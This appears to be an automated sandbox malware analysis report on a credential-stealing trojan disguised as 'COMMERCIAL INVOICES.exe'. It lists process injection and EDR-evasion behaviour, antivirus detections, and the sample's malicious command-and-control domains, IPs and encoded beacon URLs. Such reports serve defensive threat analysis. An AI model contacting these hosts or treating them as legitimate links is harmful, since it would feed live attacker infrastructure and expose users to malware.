            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531665 Sample: COMMERCIAL INVOICES.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 31 www.nibcorp.xyz 2->31 33 www.meramhaliyikama.xyz 2->33 35 13 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 6 other signatures 2->53 10 COMMERCIAL INVOICES.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\Users\user\...\COMMERCIAL INVOICES.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 COMMERCIAL INVOICES.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 oKWoZthfkV.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 taskkill.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 oKWoZthfkV.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.facaicloud.top 74.48.31.123, 49990, 49991, 49992 TELUS-3CA Canada 23->37 39 www.supox.site 162.0.225.218, 50010, 50011, 50012 NAMECHEAP-NETUS Canada 23->39 41 7 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            COMMERCIAL INVOICES.exe61%ReversingLabsByteCode-MSIL.Trojan.SnakeLogger
            COMMERCIAL INVOICES.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.n-paylity.shop
            		104.21.42.219
            		truetrue
              		unknown
              www.facaicloud.top
              		74.48.31.123
              		truetrue
                		unknown
                nibcorp.xyz
                		3.33.130.190
                		truetrue
                  		unknown
                  wcr5.top
                  		154.23.184.95
                  		truetrue
                    		unknown
                    www.master7.space
                    		199.59.243.227
                    		truetrue
                      		unknown
                      www.supox.site
                      		162.0.225.218
                      		truetrue
                        		unknown
                        www.5711337.xyz
                        		103.249.106.91
                        		truetrue
                          		unknown
                          www.syncsnode.net
                          		172.67.218.106
                          		truetrue
                            		unknown
                            93wxd.top
                            		206.119.82.147
                            		truetrue
                              		unknown
                              natroredirect.natrocdn.com
                              		85.159.66.93
                              		truetrue
                                		unknown
                                www.93wxd.top
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.nibcorp.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.wcr5.top
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.meramhaliyikama.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.nibcorp.xyz/qy56/true
                                          		unknown
                                          http://www.facaicloud.top/fxh3/?BHNhDJjp=TcdD1jH1CapNlBILQUUL6VPJeSSLh+pbMYQjXnoycmFxozx0bMDFjxvRFdG/tU/CFYGPAPKB1FL/Z2VQy4rjs+2Q8knST/5l8EVmCJfQbrXwTzWaySbdQJ1HTeqiGlwgAw==&KteDo=fX0Hm8kxatrue
                                            		unknown
                                            http://www.meramhaliyikama.xyz/vd6t/?BHNhDJjp=XaiJgAiuFnMEtmZURD8Lc3raCMtFBuupNnQYn/g1mG/l0yZG2F7WlL2GsGHsclNHOTCW0P35DR3+uir5yxADGkXKDk67ta12miPg21T/nG4AWXn5T49Yc7XX4Q8eijQzNQ==&KteDo=fX0Hm8kxatrue
                                              		unknown
                                              http://www.supox.site/ksch/true
                                                		unknown
                                                http://www.5711337.xyz/886f/?KteDo=fX0Hm8kxa&BHNhDJjp=F4WdUfqIHBg/HL3skErP7lPVDvUzs0Cr8ZA+Fg9dI3ceouFLqqnQf6dPVZvR/nKMPYrd+0qk5jIF7ORmEYYYOZXDdPSYgHhA7DdWNhIxJ8KzsbpvOzugz6Mfni67awxMIw==true
                                                  		unknown
                                                  http://www.93wxd.top/u0td/true
                                                    		unknown
                                                    http://www.nibcorp.xyz/qy56/?BHNhDJjp=uyF2ggZKoDdItulgtu2puoUsvXv1Ogv9q0328ASdq3oqq3YtlZ+hpRVw5nQuFecPffSCq9gTwMP2Kh/GIFjlwtIVkvTjWbsmVqyCPN0loUcEBtHyjsPsgz9KuMJn6hseTA==&KteDo=fX0Hm8kxatrue
                                                      		unknown
                                                      http://www.syncsnode.net/t97r/?BHNhDJjp=fU68x3PRULyXXLX18Be8OZjG7cRSBQSavMkIge0xVdkIxqx/cDskQThzDXmmTxAsHWtrBQPcDxz3o7UBkP1yUbLOTohuYgETqqTp8AigyDVY+hGioDWRRBsptVM6QvNfSQ==&KteDo=fX0Hm8kxatrue
                                                        		unknown
                                                        http://www.n-paylity.shop/bk4m/?BHNhDJjp=9ev+IdmnT8REph2CGzrIJ/IsR1IBIoPEgwjA7hGEn4o4y1K06O5g5/jYrWQAF7mhR86KKy+6wQgfy24A0MXqjVprhsrq1Iq/McMaN4BLomsWsjrPI4172Mamgtp349unMg==&KteDo=fX0Hm8kxatrue
                                                          		unknown
                                                          http://www.n-paylity.shop/bk4m/true
                                                            		unknown
                                                            http://www.syncsnode.net/t97r/true
                                                              		unknown
                                                              http://www.93wxd.top/u0td/?BHNhDJjp=EpjSVPpO4pF17PlQ3DNgKhd2v7ja1FkLRxKjmJiLsn9eFCahEsp5jtnh1y932jU+ck47tHBUUsolNvMtAutbQ5HDaIUs2x8kIyYJtigiYamWvQ0ME/HlpqSu5UMEi5UFjQ==&KteDo=fX0Hm8kxatrue
                                                                		unknown
                                                                http://www.supox.site/ksch/?BHNhDJjp=J8lzQYDSDIyYjxmyisycdc0dQo+0mdR+IGXfAda7tEE7fn+2GVkWw6+hdf3A0BNElIx5K3urdoerlkCH3feHlz5JfFADuLqaJ1HoxSfDOrbKFf5fEpK5Atk4IzSpx3Ij7g==&KteDo=fX0Hm8kxatrue
                                                                  		unknown

                                                                  URLs from Memory and Binaries

                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  http://www.5711337.xyz/yingmulin/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://duckduckgo.com/chrome_newtabtaskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.5711337.xyz/lingyuanaimili/oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://duckduckgo.com/ac/?q=taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.5711337.xyz/Dating/713e6299224.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.5711337.xyz/yasendi/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://www.5711337.xyz/xiaozaochuanlianzi/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.5711337.xyz/Love/527e6299410.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.5711337.xyz/template/news/mip05/css/style.csstaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://www.5711337.xyz/Friends/202f799790.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.5711337.xyz/jianaiyouluo/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://www.5711337.xyz/uploads/images/7115490.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.5711337.xyz/Chat/551a999439.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.5711337.xyz/Chat/633f6299304.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://www.5711337.xyz/shenchuanling/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.5711337.xyz/Chat/891c6299046.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://www.5711337.xyz/Love/640d6299297.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://www.5711337.xyz/diya/oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.5711337.xyz/macangyou/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://www.5711337.xyz/uploads/images/7517550.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://www.5711337.xyz/Marry/616e6299321.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://www.5711337.xyz/hongyinying/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          http://www.5711337.xyz/uploads/images/6782600.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.5711337.xyz/changzezi/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.5711337.xyz/uploads/images/6095900.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.5711337.xyz/shuicaowenxiang/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://www.5711337.xyz/Chat/34d6299903.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://www.5711337.xyz/aiyinmaliya/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.5711337.xyz/Dating/535e6299402.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.5711337.xyz/uploads/images/9237100.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.5711337.xyz/limeiyouliya/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://www.5711337.xyz/Love/564d099435.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://www.5711337.xyz/uploads/images/3872200.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.5711337.xyz/Dating/06b6299931.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.5711337.xyz/uploads/images/2807980.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://www.5711337.xyz/jizemingbu/oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.5711337.xyz/uploads/images/711549.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://www.5711337.xyz/Chat/646e6299291.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          http://www.5711337.xyz/Friends/875c6299062.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.5711337.xyz/shuiyechaoyang/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.5711337.xyz/Dating/448a6299489.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.5711337.xyz/Chat/607d899384.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://www.5711337.xyz/xiqijiexika/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.ecosia.org/newtab/taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.5711337.xyz/Friends/005b6299932.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.5711337.xyz/Friends/938e6298999.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.5711337.xyz/Friends/287d099712.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.5711337.xyz/uploads/images/3605400.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.5711337.xyz/jinmeixiang/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.5711337.xyz/shananfenghua/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.5711337.xyz/Chat/341b6299596.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.5711337.xyz/uploads/images/4777950.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.5711337.xyz/Love/070a6299867.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.5711337.xyz/qiaobenyoucai/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.5711337.xyz/xiaoxiyou/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.5711337.xyz/xidaoaili/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.5711337.xyz/uploads/images/7115492.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://www.5711337.xyz/uploads/images/1647670.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://www.5711337.xyz/chaomeihuixiang/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://www.5711337.xyz/Dating/079f6299858.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://www.5711337.xyz/Marry/214a799778.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.5711337.xyz/fengjianyoumei/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.5711337.xyz/sitemap.xmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.5711337.xyz/uploads/images/7115491.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.5711337.xyz/tengpuhui/taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://www.5711337.xyz/taonaimuxiangnai/oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://www.5711337.xyz/uploads/images/2064240.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://www.5711337.xyzoKWoZthfkV.exe, 00000009.00000002.3898777340.0000000000D27000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.5711337.xyz/Dating/540a6299397.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://www.5711337.xyz/uploads/images/8042350.jpgtaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://www.5711337.xyz/Dating/33e6299904.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://c.mipcdn.com/static/v1/mip.csstaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.5711337.xyz/Marry/592d6299345.htmltaskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtaskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                                              		unknown
